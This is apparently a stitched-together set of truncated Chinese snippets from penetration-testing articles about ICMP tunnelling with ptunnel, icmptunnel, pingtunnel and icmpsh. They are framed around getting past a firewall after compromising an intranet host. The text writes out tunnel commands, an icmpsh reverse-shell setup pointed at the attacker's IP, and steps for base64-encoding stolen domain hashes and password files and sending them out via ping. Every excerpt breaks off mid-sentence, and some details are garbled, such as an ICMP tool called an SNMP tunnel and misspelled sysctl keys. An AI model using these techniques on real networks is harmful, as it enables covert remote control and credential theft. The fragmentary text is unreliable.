通过ICMP echo(ping request)和reply(ping reply)实现隧道 适用于防火墙只允许ping出站流量的环境 支持多并发连接,性能优 支持身份验证 使用时需要root用户 端口转发 主机2作为ptunnle服务器 ptunnel -x <password> 主机1客户端连接服务器主机2 ptunnel -p <服务器ip> -lp <本地侦听端口> -da <目标ip> -dp <目标端口> -x <passwo…

一.ICMP隧道 背景:已经通过某种手段拿到了园区网A主机的控制权,但是边界防火墙只放行该主机向外的ICMP流量,此时怎样才能让A主机和公网主机C建立TCP连接呢? 方案:将TCP包内容包裹在ICMP中进行传递 工具: ptunnel 工作原理:A主机通过周期性向渗透测试工程师发送ICMP请求以建立ICMP连接.在本地侦听一个空闲端口并与指定IP的指定端口(C主机)建立映射.此时访问侦听的这个端口就相当于访问公网指定IP的指定端口了(C主机) 隧道建立命令: 渗透测试工程师端(开启这个程序后本地…

ICMP隧道工具ptunnel   在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截.如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问.Kali Linux提供了一款ICMP隧道专用工具ptunnel.用户需要在受限制网络之外,预先启动该工具建立代理服务器.再以客户端模式运行该工具,就可以建立ICMP隧道.为了避免该隧道被滥用,用户还可以为隧道设置使用密码.…

ICMP协议被用于检测网络连通状态的协议,通常情况下,防火墙会默认放过该协议. 渗透测试中经常出现一种情况是,我们通过某一种方式取得了一台主机的权限,得到了一些文件,比如域hash,密码文件之类的东西,需要回传至本地进行破解,但是防火墙阻断了由内网发起请求的协议,只有icmp没有被阻断,而我们又需要回传文件,这个时候就可以利用icmp隧道来进行传输. [基本步骤]如下: (1).将所要传输的文件进行base64编码:windows下可以用certutil命令;linux可以用base64命令 (…

利用 ICMP 隧道穿透防火墙 转自:http://xiaix.me/li-yong-icmp-sui-dao-chuan-tou-fang-huo-qiang/ 以前穿透防火墙总是使用 SSH 隧道.DNS 隧道或 HTTP 隧道等等,今天来说一个利用 SNMP 隧道进行穿透工具--icmptunnel. 简介 icmptunnel 可以将 IP 流量封装进 IMCP 的 ping 数据包中,旨在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的.但是现在市面上已经…

一.pingtunnel工作原理 在上面的实验环境中,我们将分别在攻击机kali 2020和webserver上部署pingtunnel工具,在量太主机之间实现icmp隧道,再在kali2020上监听1080(图中写错了,没改过来),将webserver访问内网主机server2003远程桌面3389的数据通过icmp协议进行数据封装,然后转发到kali2020的1080端口上,从而实现了win7上访问server2003上3389端口的目的.webserver作为黑客的一个跳板,从而控制内网的…

一,隐藏通信隧道基础知识 在完成信息收集之后,我们要判断流量是否出的去.进的来.隐藏通信隧道技术常用于在受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输. 1.常见的隧道: .网络层:IPv6隧道.ICMP隧道.GRE隧道 .传输层:TCP隧道.UDP隧道.常规端口转发 .应用层:SSH隧道.HTTP隧道.HTTPS隧道.DNS隧道 2.判断内网的连通性 判断内网的连通性是指判断机器能否上外网等.要综合判断各种协议(TCP.HTTP.DNS.ICMP等)及端口通信的情况.常见的…

本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t host主机ip地址,用于向其发送ping请求. 此选项是强制性的! -r 发送包含字符串" Test1234&…

下载地址: https://github.com/inquisb/icmpsh#usage kali下载 git clone https://github.com/inquisb/icmpsh.git 安装依赖包 apt-get install python-impacket 关闭本地ICMP的应答,否则shell会不稳定 sysctl -w net.ipv4.icmp_echo_ignore_all=1 然后./run.sh运行  按提示输入目标主机的公网ip地址 然后报错了..暂时不知道原因…

参考文章:http://www.sohu.com/a/297393423_783648…